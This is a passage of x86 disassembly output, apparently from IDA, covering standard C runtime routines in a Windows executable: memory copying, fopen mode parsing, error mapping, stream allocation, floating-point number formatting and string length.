std
rep movsd
cld
jmp off_41B7E8[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_41B79C
dd offset loc_41B7A4
dd offset loc_41B7AC
dd offset loc_41B7B4
dd offset loc_41B7BC
dd offset loc_41B7C4
dd offset loc_41B7CC
off_41B798 dd offset loc_41B7DF ; DATA XREF: sub_41B500+1C6�r
; ---------------------------------------------------------------------------
loc_41B79C: ; DATA XREF: sub_41B500+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41B7A4: ; DATA XREF: sub_41B500+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_41B7AC: ; DATA XREF: sub_41B500+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41B7B4: ; DATA XREF: sub_41B500+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_41B7BC: ; DATA XREF: sub_41B500+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41B7C4: ; DATA XREF: sub_41B500+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_41B7CC: ; DATA XREF: sub_41B500+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41B7DF: ; CODE XREF: sub_41B500+1C6�j
; DATA XREF: sub_41B500:off_41B798�o
jmp off_41B7E8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41B7E8 dd offset loc_41B7F8 ; DATA XREF: sub_41B500+1BB�r
; sub_41B500:loc_41B6E8�r ...
dd offset loc_41B800
dd offset loc_41B810
dd offset loc_41B824
; ---------------------------------------------------------------------------
loc_41B7F8: ; CODE XREF: sub_41B500+1BB�j
; sub_41B500:loc_41B6E8�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41B800: ; CODE XREF: sub_41B500+1BB�j
; sub_41B500:loc_41B6E8�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41B810: ; CODE XREF: sub_41B500+1BB�j
; sub_41B500:loc_41B6E8�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41B824: ; CODE XREF: sub_41B500+1BB�j
; sub_41B500:loc_41B6E8�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_41B500 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B83D proc near ; CODE XREF: sub_4171B0+35�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_4814D8
push edi
mov edi, [ebp+arg_4]
mov al, [edi]
xor ebx, ebx
cmp al, 61h
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jz short loc_41B876
cmp al, 72h
jz short loc_41B86F
cmp al, 77h
jnz loc_41B982
mov ecx, 301h
jmp short loc_41B87B
; ---------------------------------------------------------------------------
loc_41B86F: ; CODE XREF: sub_41B83D+21�j
xor ecx, ecx
or esi, 1
jmp short loc_41B87E
; ---------------------------------------------------------------------------
loc_41B876: ; CODE XREF: sub_41B83D+1D�j
mov ecx, 109h
loc_41B87B: ; CODE XREF: sub_41B83D+30�j
or esi, 2
loc_41B87E: ; CODE XREF: sub_41B83D+37�j
xor edx, edx
inc edx
jmp loc_41B95D
; ---------------------------------------------------------------------------
loc_41B886: ; CODE XREF: sub_41B83D+125�j
cmp edx, ebx
jz loc_41B968
movsx eax, al
cmp eax, 54h
jg short loc_41B907
jz short loc_41B8FA
sub eax, 2Bh
jz short loc_41B8E4
sub eax, 19h
jz short loc_41B8DA
sub eax, 0Eh
jz short loc_41B8C6
dec eax
jnz loc_41B93F
cmp [ebp+var_4], ebx
jnz loc_41B93F
mov [ebp+var_4], 1
or ecx, 20h
jmp loc_41B95D
; ---------------------------------------------------------------------------
loc_41B8C6: ; CODE XREF: sub_41B83D+68�j
cmp [ebp+var_4], ebx
jnz short loc_41B93F
mov [ebp+var_4], 1
or ecx, 10h
jmp loc_41B95D
; ---------------------------------------------------------------------------
loc_41B8DA: ; CODE XREF: sub_41B83D+63�j
test cl, 40h
jnz short loc_41B93F
or ecx, 40h
jmp short loc_41B95D
; ---------------------------------------------------------------------------
loc_41B8E4: ; CODE XREF: sub_41B83D+5E�j
test cl, 2
jnz short loc_41B93F
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_41B95D
; ---------------------------------------------------------------------------
loc_41B8FA: ; CODE XREF: sub_41B83D+59�j
mov eax, 1000h
test ecx, eax
jnz short loc_41B93F
or ecx, eax
jmp short loc_41B95D
; ---------------------------------------------------------------------------
loc_41B907: ; CODE XREF: sub_41B83D+57�j
sub eax, 62h
jz short loc_41B952
dec eax
jz short loc_41B93A
sub eax, 0Bh
jz short loc_41B926
sub eax, 6
jnz short loc_41B93F
test ch, 0C0h
jnz short loc_41B93F
or ecx, 4000h
jmp short loc_41B95D
; ---------------------------------------------------------------------------
loc_41B926: ; CODE XREF: sub_41B83D+D5�j
cmp [ebp+var_8], ebx
jnz short loc_41B93F
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp short loc_41B95D
; ---------------------------------------------------------------------------
loc_41B93A: ; CODE XREF: sub_41B83D+D0�j
cmp [ebp+var_8], ebx
jz short loc_41B943
loc_41B93F: ; CODE XREF: sub_41B83D+6B�j
; sub_41B83D+74�j ...
xor edx, edx
jmp short loc_41B95D
; ---------------------------------------------------------------------------
loc_41B943: ; CODE XREF: sub_41B83D+100�j
mov [ebp+var_8], 1
or esi, 4000h
jmp short loc_41B95D
; ---------------------------------------------------------------------------
loc_41B952: ; CODE XREF: sub_41B83D+CD�j
test ch, 0C0h
jnz short loc_41B93F
or ecx, 8000h
loc_41B95D: ; CODE XREF: sub_41B83D+44�j
; sub_41B83D+84�j ...
inc edi
mov al, [edi]
cmp al, bl
jnz loc_41B886
loc_41B968: ; CODE XREF: sub_41B83D+4B�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41FBDC
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41B986
loc_41B982: ; CODE XREF: sub_41B83D+25�j
xor eax, eax
jmp short loc_41B9A0
; ---------------------------------------------------------------------------
loc_41B986: ; CODE XREF: sub_41B83D+143�j
mov eax, [ebp+arg_C]
inc dword_481338
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41B9A0: ; CODE XREF: sub_41B83D+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B83D endp
; =============== S U B R O U T I N E =======================================
sub_41B9A5 proc near ; CODE XREF: sub_4171B0+18�p
; sub_4172A4+2B�p ...
call sub_4191CF
add eax, 8
retn
sub_41B9A5 endp
; =============== S U B R O U T I N E =======================================
sub_41B9AE proc near ; CODE XREF: sub_4172A4+36�p
; sub_41AE16+8A�p ...
call sub_4191CF
add eax, 0Ch
retn
sub_41B9AE endp
; =============== S U B R O U T I N E =======================================
sub_41B9B7 proc near ; CODE XREF: sub_4172A4+16�p
; sub_418075+1D�p ...
arg_0 = dword ptr 4
push esi
call sub_4191CF
mov ecx, [esp+4+arg_0]
mov [eax+0Ch], ecx
xor esi, esi
loc_41B9C6: ; CODE XREF: sub_41B9B7+1C�j
cmp ecx, dword_4328E0[esi*8]
jz short loc_41B9ED
inc esi
cmp esi, 2Dh
jb short loc_41B9C6
cmp ecx, 13h
jb short loc_41B9FE
cmp ecx, 24h
ja short loc_41B9FE
call sub_4191CF
mov dword ptr [eax+8], 0Dh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B9ED: ; CODE XREF: sub_41B9B7+16�j
call sub_4191CF
mov ecx, dword_4328E4[esi*8]
mov [eax+8], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B9FE: ; CODE XREF: sub_41B9B7+21�j
; sub_41B9B7+26�j
cmp ecx, 0BCh
jb short loc_41BA1C
cmp ecx, 0CAh
ja short loc_41BA1C
call sub_4191CF
mov dword ptr [eax+8], 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_41BA1C: ; CODE XREF: sub_41B9B7+4D�j
; sub_41B9B7+55�j
call sub_4191CF
mov dword ptr [eax+8], 16h
pop esi
retn
sub_41B9B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA2A proc near ; CODE XREF: sub_4171B0+C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_42C0E8
call __SEH_prolog
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_41A1D6
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_41BA4A: ; CODE XREF: sub_41BA2A+85�j
mov [ebp+var_20], esi
cmp esi, dword_482960
jge loc_41BB19
mov eax, dword_481940
mov eax, [eax+esi*4]
cmp eax, ebx
jz short loc_41BAB5
test byte ptr [eax+0Ch], 83h
jnz short loc_41BAAE
cmp esi, 2
jle short loc_41BA87
cmp esi, 14h
jge short loc_41BA87
lea eax, [esi+10h]
push eax
call sub_41A157
pop ecx
test eax, eax
jz loc_41BB19
loc_41BA87: ; CODE XREF: sub_41BA2A+44�j
; sub_41BA2A+49�j
mov eax, dword_481940
push dword ptr [eax+esi*4]
push esi
call sub_41B131
pop ecx
pop ecx
mov eax, dword_481940
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_41BAB1
push eax
push esi
call sub_41B183
pop ecx
pop ecx
loc_41BAAE: ; CODE XREF: sub_41BA2A+3F�j
inc esi
jmp short loc_41BA4A
; ---------------------------------------------------------------------------
loc_41BAB1: ; CODE XREF: sub_41BA2A+79�j
mov edi, eax
jmp short loc_41BB16
; ---------------------------------------------------------------------------
loc_41BAB5: ; CODE XREF: sub_41BA2A+39�j
shl esi, 2
push 38h
call sub_416E1F
pop ecx
mov ecx, dword_481940
mov [esi+ecx], eax
mov eax, dword_481940
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_41BB19
push 0FA0h
add eax, 20h
push eax
call sub_41EFD0
pop ecx
pop ecx
test eax, eax
mov eax, dword_481940
jnz short loc_41BB01
push dword ptr [esi+eax]
call sub_416D07
pop ecx
mov eax, dword_481940
mov [esi+eax], ebx
jmp short loc_41BB19
; ---------------------------------------------------------------------------
loc_41BB01: ; CODE XREF: sub_41BA2A+C2�j
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_42201C ; RtlEnterCriticalSection
mov eax, dword_481940
mov edi, [esi+eax]
loc_41BB16: ; CODE XREF: sub_41BA2A+89�j
mov [ebp+var_1C], edi
loc_41BB19: ; CODE XREF: sub_41BA2A+29�j
; sub_41BA2A+57�j ...
cmp edi, ebx
jz short loc_41BB2F
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_41BB2F: ; CODE XREF: sub_41BA2A+F1�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41BB43
mov eax, edi
call __SEH_epilog
retn
sub_41BA2A endp
; =============== S U B R O U T I N E =======================================
sub_41BB40 proc near ; DATA XREF: .text:stru_42C0E8�o
mov edi, [ebp-1Ch]
sub_41BB40 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41BB43 proc near ; CODE XREF: sub_41BA2A+109�p
push 1
call sub_41A142
pop ecx
retn
sub_41BB43 endp
; =============== S U B R O U T I N E =======================================
sub_41BB4C proc near ; CODE XREF: sub_418A1C+459�p
; DATA XREF: sub_417255+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_4179CA
cmp eax, 65h
jmp short loc_41BB6B
; ---------------------------------------------------------------------------
loc_41BB5F: ; CODE XREF: sub_41BB4C+20�j
inc esi
movsx eax, byte ptr [esi]
push eax
call sub_41E6D9
test eax, eax
loc_41BB6B: ; CODE XREF: sub_41BB4C+11�j
pop ecx
jnz short loc_41BB5F
mov al, [esi]
mov cl, byte_432CB8
mov [esi], cl
inc esi
loc_41BB79: ; CODE XREF: sub_41BB4C+38�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41BB79
pop esi
retn
sub_41BB4C endp
; =============== S U B R O U T I N E =======================================
sub_41BB88 proc near ; CODE XREF: sub_418A1C+46A�p
; DATA XREF: sub_417255+A�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov bl, byte_432CB8
jmp short loc_41BB9A
; ---------------------------------------------------------------------------
loc_41BB95: ; CODE XREF: sub_41BB88+16�j
cmp cl, bl
jz short loc_41BBA0
inc eax
loc_41BB9A: ; CODE XREF: sub_41BB88+B�j
mov cl, [eax]
test cl, cl
jnz short loc_41BB95
loc_41BBA0: ; CODE XREF: sub_41BB88+F�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_41BBD1
jmp short loc_41BBB4
; ---------------------------------------------------------------------------
loc_41BBA9: ; CODE XREF: sub_41BB88+30�j
cmp cl, 65h
jz short loc_41BBBA
cmp cl, 45h
jz short loc_41BBBA
inc eax
loc_41BBB4: ; CODE XREF: sub_41BB88+1F�j
mov cl, [eax]
test cl, cl
jnz short loc_41BBA9
loc_41BBBA: ; CODE XREF: sub_41BB88+24�j
; sub_41BB88+29�j
mov edx, eax
loc_41BBBC: ; CODE XREF: sub_41BB88+38�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41BBBC
cmp [eax], bl
jnz short loc_41BBC7
dec eax
loc_41BBC7: ; CODE XREF: sub_41BB88+3C�j
; sub_41BB88+47�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_41BBC7
loc_41BBD1: ; CODE XREF: sub_41BB88+1D�j
pop ebx
retn
sub_41BB88 endp
; =============== S U B R O U T I N E =======================================
sub_41BBD3 proc near ; DATA XREF: sub_417255+28�o
; .text:off_432A58�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp dbl_42C0F8
fnstsw ax
test ah, 1
jnz short loc_41BBEA
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41BBEA: ; CODE XREF: sub_41BBD3+11�j
xor eax, eax
retn
sub_41BBD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBED proc near ; CODE XREF: sub_4192C5+40D�p
; DATA XREF: sub_417255+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_41BC16
lea eax, [ebp+var_8]
push eax
call sub_41FF55
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_41BC16: ; CODE XREF: sub_41BBED+C�j
lea eax, [ebp+arg_0]
push eax
call sub_41FF98
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [eax], ecx
leave
retn
sub_41BBED endp
; =============== S U B R O U T I N E =======================================
sub_41BC2B proc near ; CODE XREF: sub_41BC48+23�p
; sub_41BD6A+45�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_41BC46
push esi
call sub_419D70
inc eax
push eax
push esi
add esi, edi
push esi
call sub_41F060
add esp, 10h
loc_41BC46: ; CODE XREF: sub_41BC2B+5�j
pop esi
retn
sub_41BC2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BC48 proc near ; CODE XREF: sub_41BCF6+5B�p
; sub_41BE6E+88�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
push esi
mov esi, eax
jz short loc_41BC71
xor eax, eax
cmp [ebp+arg_0], eax
push edi
setnle al
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
mov edi, eax
add ecx, ebx
mov eax, ecx
call sub_41BC2B
pop edi
loc_41BC71: ; CODE XREF: sub_41BC48+A�j
cmp dword ptr [esi], 2Dh
mov eax, ebx
jnz short loc_41BC7E
mov byte ptr [ebx], 2Dh
lea eax, [ebx+1]
loc_41BC7E: ; CODE XREF: sub_41BC48+2E�j
cmp [ebp+arg_0], 0
jle short loc_41BC95
lea ecx, [eax+1]
mov dl, [ecx]
mov [eax], dl
mov eax, ecx
mov cl, byte_432CB8
mov [eax], cl
loc_41BC95: ; CODE XREF: sub_41BC48+3A�j
xor ecx, ecx
cmp [ebp+arg_8], cl
push offset dword_42C100
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
push ecx
call sub_41BFE0
cmp [ebp+arg_4], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_41BCBA
mov byte ptr [ecx], 45h
loc_41BCBA: ; CODE XREF: sub_41BC48+6D�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_41BCF1
mov eax, [esi+4]
dec eax
jns short loc_41BCCE
neg eax
mov byte ptr [ecx], 2Dh
loc_41BCCE: ; CODE XREF: sub_41BC48+7F�j
inc ecx
cmp eax, 64h
jl short loc_41BCDE
cdq
push 64h
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_41BCDE: ; CODE XREF: sub_41BC48+8A�j
inc ecx
cmp eax, 0Ah
jl short loc_41BCEE
cdq
push 0Ah
pop esi
idiv esi
add [ecx], al
mov eax, edx
loc_41BCEE: ; CODE XREF: sub_41BC48+9A�j
add [ecx+1], al
loc_41BCF1: ; CODE XREF: sub_41BC48+79�j
mov eax, ebx
pop esi
pop ebp
retn
sub_41BC48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BCF6 proc near ; CODE XREF: sub_41BF0E+47�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
push esi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_42010C
mov esi, [ebp+arg_8]
mov ebx, [ebp+arg_4]
lea eax, [ebp+var_14]
push eax
lea eax, [esi+1]
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
mov edx, ebx
setz al
xor ecx, ecx
test esi, esi
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_41FFDB
push 0
push [ebp+arg_C]
lea eax, [ebp+var_14]
push esi
call sub_41BC48
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 28h
pop esi
mov eax, ebx
pop ebx
call sub_41C596
leave
retn
sub_41BCF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD6A proc near ; CODE XREF: sub_41BE06+4F�p
; sub_41BE6E+75�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, eax
mov eax, [esi+4]
dec eax
cmp [ebp+arg_8], 0
push edi
jz short loc_41BD97
cmp eax, [ebp+arg_4]
jnz short loc_41BD97
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, [ebp+arg_0]
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
loc_41BD97: ; CODE XREF: sub_41BD6A+10�j
; sub_41BD6A+15�j
cmp dword ptr [esi], 2Dh
mov ebx, [ebp+arg_0]
jnz short loc_41BDA3
mov byte ptr [ebx], 2Dh
inc ebx
loc_41BDA3: ; CODE XREF: sub_41BD6A+33�j
mov eax, [esi+4]
xor edi, edi
inc edi
test eax, eax
jg short loc_41BDBA
mov eax, ebx
call sub_41BC2B
mov byte ptr [ebx], 30h
inc ebx
jmp short loc_41BDBC
; ---------------------------------------------------------------------------
loc_41BDBA: ; CODE XREF: sub_41BD6A+41�j
add ebx, eax
loc_41BDBC: ; CODE XREF: sub_41BD6A+4E�j
cmp [ebp+arg_4], 0
jle short loc_41BDFE
mov eax, ebx
call sub_41BC2B
mov al, byte_432CB8
mov [ebx], al
mov esi, [esi+4]
inc ebx
test esi, esi
jge short loc_41BDFE
neg esi
cmp [ebp+arg_8], 0
jnz short loc_41BDE5
cmp [ebp+arg_4], esi
jl short loc_41BDE8
loc_41BDE5: ; CODE XREF: sub_41BD6A+74�j
mov [ebp+arg_4], esi
loc_41BDE8: ; CODE XREF: sub_41BD6A+79�j
mov edi, [ebp+arg_4]
mov eax, ebx
call sub_41BC2B
push edi
push 30h
push ebx
call sub_41E8F0
add esp, 0Ch
loc_41BDFE: ; CODE XREF: sub_41BD6A+56�j
; sub_41BD6A+6C�j
mov eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41BD6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE06 proc near ; CODE XREF: sub_41BF0E+1E�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_432A68
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_42010C
mov esi, [ebp+arg_8]
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_10]
add eax, esi
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
push eax
call sub_41FFDB
push 0
push esi
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_41BD6A
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+arg_4]
add esp, 28h
pop esi
call sub_41C596
leave
retn
sub_41BE06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE6E proc near ; CODE XREF: sub_41BF0E+34�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_42010C
mov esi, [ebp+var_10]
mov ebx, [ebp+arg_8]
xor eax, eax
dec esi
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
mov edi, eax
lea eax, [ebp+var_14]
push eax
push ebx
push edi
call sub_41FFDB
mov eax, [ebp+var_10]
add esp, 1Ch
dec eax
cmp esi, eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_41BEEA
cmp eax, ebx
jge short loc_41BEEA
test cl, cl
jz short loc_41BEDA
loc_41BED0: ; CODE XREF: sub_41BE6E+67�j
mov al, [edi]
inc edi
test al, al
jnz short loc_41BED0
and [edi-2], al
loc_41BEDA: ; CODE XREF: sub_41BE6E+60�j
push 1
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_41BD6A
jmp short loc_41BEFB
; ---------------------------------------------------------------------------
loc_41BEEA: ; CODE XREF: sub_41BE6E+58�j
; sub_41BE6E+5C�j
push 1
push [ebp+arg_C]
lea eax, [ebp+var_14]
push ebx
mov ebx, [ebp+arg_4]
call sub_41BC48
loc_41BEFB: ; CODE XREF: sub_41BE6E+7A�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 0Ch
pop edi
pop esi
pop ebx
call sub_41C596
leave
retn
sub_41BE6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF0E proc near ; CODE XREF: sub_418A1C+43E�p
; DATA XREF: sub_417255�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_41BF49
cmp [ebp+arg_8], 45h
jz short loc_41BF49
cmp [ebp+arg_8], 66h
jnz short loc_41BF36
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41BE06
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41BF36: ; CODE XREF: sub_41BF0E+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41BE6E
jmp short loc_41BF5A
; ---------------------------------------------------------------------------
loc_41BF49: ; CODE XREF: sub_41BF0E+7�j
; sub_41BF0E+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41BCF6
loc_41BF5A: ; CODE XREF: sub_41BF0E+39�j
add esp, 10h
pop ebp
retn
sub_41BF0E endp
; =============== S U B R O U T I N E =======================================
sub_41BF5F proc near ; CODE XREF: sub_41728D+F�p
push 30000h
push 10000h
call sub_4202D9
pop ecx
pop ecx
retn
sub_41BF5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BF71 proc near ; CODE XREF: sub_41BFB1:loc_41BFD5�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld dbl_42C118
fstp [ebp+var_8]
fld dbl_42C110
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp dbl_42C108
fnstsw ax
test ah, 41h
jnz short loc_41BFAD
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_41BFAD: ; CODE XREF: sub_41BF71+35�j
xor eax, eax
leave
retn
sub_41BF71 endp
; =============== S U B R O U T I N E =======================================
sub_41BFB1 proc near ; CODE XREF: sub_41728D+5�p
push offset aKernel32 ; "KERNEL32"
call dword_4220A4 ; GetModuleHandleA
test eax, eax
jz short loc_41BFD5
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call dword_422084 ; GetProcAddress
test eax, eax
jz short loc_41BFD5
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_41BFD5: ; CODE XREF: sub_41BFB1+D�j
; sub_41BFB1+1D�j
jmp sub_41BF71
sub_41BFB1 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BFE0 proc near ; CODE XREF: sub_4174C6+F5�p
; sub_41BC48+60�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_41C055
sub_41BFE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41BFF0 proc near ; CODE XREF: sub_41D967+10B�p
; sub_41D967+116�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_41C010
loc_41BFFD: ; CODE XREF: sub_41BFF0+1C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_41C043
test ecx, 3
jnz short loc_41BFFD
mov edi, edi
loc_41C010: ; CODE XREF: sub_41BFF0+B�j
; sub_41BFF0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41C010
mov eax, [ecx-4]
test al, al
jz short loc_41C052
test ah, ah
jz short loc_41C04D
test eax, 0FF0000h
jz short loc_41C048
test eax, 0FF000000h
jz short loc_41C043
jmp short loc_41C010
; ---------------------------------------------------------------------------
loc_41C043: ; CODE XREF: sub_41BFF0+14�j
; sub_41BFF0+4F�j
lea edi, [ecx-1]
jmp short loc_41C055
; ---------------------------------------------------------------------------
loc_41C048: ; CODE XREF: sub_41BFF0+48�j
lea edi, [ecx-2]
jmp short loc_41C055
; ---------------------------------------------------------------------------
loc_41C04D: ; CODE XREF: sub_41BFF0+41�j
lea edi, [ecx-3]
jmp short loc_41C055
; ---------------------------------------------------------------------------
loc_41C052: ; CODE XREF: sub_41BFF0+3D�j
lea edi, [ecx-4]
loc_41C055: ; CODE XREF: sub_41BFE0+5�j
; sub_41BFF0+56�j ...
